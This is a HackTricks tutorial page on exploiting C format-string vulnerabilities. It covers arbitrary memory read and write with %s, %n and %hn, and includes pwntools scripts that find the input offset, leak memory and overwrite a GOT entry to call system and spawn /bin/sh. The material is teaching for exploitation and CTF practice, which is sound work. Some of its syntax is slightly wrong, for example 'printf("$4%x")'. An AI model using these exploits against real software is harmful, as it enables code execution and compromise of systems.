hacktricks/binary-exploitation/format-strings/README.md
2024-07-18 22:49:07 +02:00

269 lines
12 KiB
Markdown

# Format Strings
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
In C **`printf`** is a function that can be used to **print** some string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** from the raw text.
Other vulnerable functions are **`sprintf()`** and **`fprintf()`**.
The vulnerability appears when an **attacker text is used as the first argument** to this function. The attacker will be able to craft a **special input abusing** the **printf format** string capabilities to read and **write any data in any address (readable/writable)**. Being able this way to **execute arbitrary code**.
#### Formatters:
```bash
%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%p —> Pointer
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
```
**Examples:**
* Vulnerable example:
```c
char buffer[30];
gets(buffer); // Dangerous: takes user input without restrictions.
printf(buffer); // If buffer contains "%x", it reads from the stack.
```
* Normal Use:
```c
int value = 1205;
printf("%x %x %x", value, value, value); // Outputs: 4b5 4b5 4b5
```
* With Missing Arguments:
```c
printf("%x %x %x", value); // Unexpected output: reads random values from the stack.
```
* fprintf vulnerable:
```c
#include <stdio.h>
int main(int argc, char *argv[]) {
char *user_input;
user_input = argv[1];
FILE *output_file = fopen("output.txt", "w");
fprintf(output_file, user_input); // The user input cna include formatters!
fclose(output_file);
return 0;
}
```
### **Accessing Pointers**
The format **`%<n>$x`**, where `n` is a number, allows to indicate to printf to select the n parameter (from the stack). So if you want to read the 4th param from the stack using printf you could do:
```c
printf("%x %x %x %x")
```
and you would read from the first to the forth param.
Or you could do:
```c
printf("$4%x")
```
and read directly the forth.
Notice that the attacker controls the `pr`**`intf` parameter, which basically means that** his input is going to be in the stack when `printf` is called, which means that he could write specific memory addresses in the stack.
{% hint style="danger" %}
An attacker controlling this input, will be able to **add arbitrary address in the stack and make `printf` access them**. In the next section it will be explained how to use this behaviour.
{% endhint %}
## **Arbitrary Read**
It's possible to use the formatter **`%n$s`** to make **`printf`** get the **address** situated in the **n position**, following it and **print it as if it was a string** (print until a 0x00 is found). So if the base address of the binary is **`0x8048000`**, and we know that the user input starts in the 4th position in the stack, it's possible to print the starting of the binary with:
```python
from pwn import *
p = process('./bin')
payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param
p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
```
{% hint style="danger" %}
Note that you cannot put the address 0x8048000 at the beginning of the input because the string will be cat in 0x00 at the end of that address.
{% endhint %}
### Find offset
To find the offset to your input you could send 4 or 8 bytes (`0x41414141`) followed by **`%1$x`** and **increase** the value till retrieve the `A's`.
<details>
<summary>Brute Force printf offset</summary>
```python
# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
from pwn import *
# Iterate over a range of integers
for i in range(10):
# Construct a payload that includes the current integer as offset
payload = f"AAAA%{i}$x".encode()
# Start a new process of the "chall" binary
p = process("./chall")
# Send the payload to the process
p.sendline(payload)
# Read and store the output of the process
output = p.clean()
# Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
if b"41414141" in output:
# If the string is found, log the success message and break out of the loop
log.success(f"User input is at offset : {i}")
break
# Close the process
p.close()
```
</details>
### How useful
Arbitrary reads can be useful to:
* **Dump** the **binary** from memory
* **Access specific parts of memory where sensitive** **info** is stored (like canaries, encryption keys or custom passwords like in this [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))
## **Arbitrary Write**
The formatter **`$<num>%n`** **writes** the **number of written bytes** in the **indicated address** in the \<num> param in the stack. If an attacker can write as many char as he will with printf, he is going to be able to make **`$<num>%n`** write an arbitrary number in an arbitrary address.
Fortunately, to write the number 9999, it's not needed to add 9999 "A"s to the input, in order to so so it's possible to use the formatter **`%.<num-write>%<num>$n`** to write the number **`<num-write>`** in the **address pointed by the `num` position**.
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
```
However, note that usually in order to write an address such as `0x08049724` (which is a HUGE number to write at once), **it's used `$hn`** instead of `$n`. This allows to **only write 2 Bytes**. Therefore this operation is done twice, one for the highest 2B of the address and another time for the lowest ones.
Therefore, this vulnerability allows to **write anything in any address (arbitrary write).**
In this example, the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Although this could abuse other arbitrary write to exec techniques:
{% content-ref url="../arbitrary-write-2-exec/" %}
[arbitrary-write-2-exec](../arbitrary-write-2-exec/)
{% endcontent-ref %}
We are going to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**.\
As mentioned, to write the address, usually 2 steps are needed: You **first writes 2Bytes** of the address and then the other 2. To do so **`$hn`** is used.
* **HOB** is called to the 2 higher bytes of the address
* **LOB** is called to the 2 lower bytes of the address
Then, because of how format string works you need to **write first the smallest** of \[HOB, LOB] and then the other one.
If HOB < LOB\
`[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]`
If HOB > LOB\
`[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]`
HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB
{% code overflow="wrap" %}
```bash
python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
```
{% endcode %}
### Pwntools Template
You can find a **template** to prepare a exploit for this kind of vulnerability in:
{% content-ref url="format-strings-template.md" %}
[format-strings-template.md](format-strings-template.md)
{% endcontent-ref %}
Or this basic example from [**here**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite):
```python
from pwn import *
elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000 # ASLR disabled
p = process()
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
p.clean()
p.sendline('/bin/sh')
p.interactive()
```
## Format Strings to BOF
It's possible to abuse the write actions of a format string vulnerability to **write in addresses of the stack** and exploit a **buffer overflow** type of vulnerability.
## Other Examples & References
* [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string)
* [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
* [https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak)
* [https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html)
* 32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
* [https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html)
* 32 bit, relro, no canary, nx, no pie, format string to overwrite the address `fflush` with the win function (ret2win)
* [https://guyinatuxedo.github.io/10-fmt\_strings/tw16\_greeting/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/tw16\_greeting/index.html)
* 32 bit, relro, no canary, nx, no pie, format string to write an address inside main in `.fini_array` (so the flow loops back 1 more time) and write the address to `system` in the GOT table pointing to `strlen`. When the flow goes back to main, `strlen` is executed with user input and pointing to `system`, it will execute the passed commands.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}